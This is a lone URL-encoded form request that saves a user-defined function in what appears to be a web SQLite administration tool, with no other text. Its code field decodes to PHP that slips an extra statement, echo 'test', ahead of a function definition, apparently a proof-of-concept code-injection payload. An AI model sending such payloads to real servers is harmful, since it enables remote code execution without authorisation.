    FunctName=IF&FunctType=1&FunctCode=echo+%27test%27%3B%0D%0Afunction+sqliteIf%28%24compare%2C+%24good%2C+%24bad%29%7B%0D%0A++++if+%28%24compare%29+%7B%0D%0A++++++++return+%24good%3B%0D%0A++++%7D+else+%7B+%0D%0A++++++++return+%24bad%3B%0D%0A++++%7D%0D%0A%7D&FunctFinalCode=&FunctNumArgs=3&FunctAttribAll=1&function=IF&id=1&action=save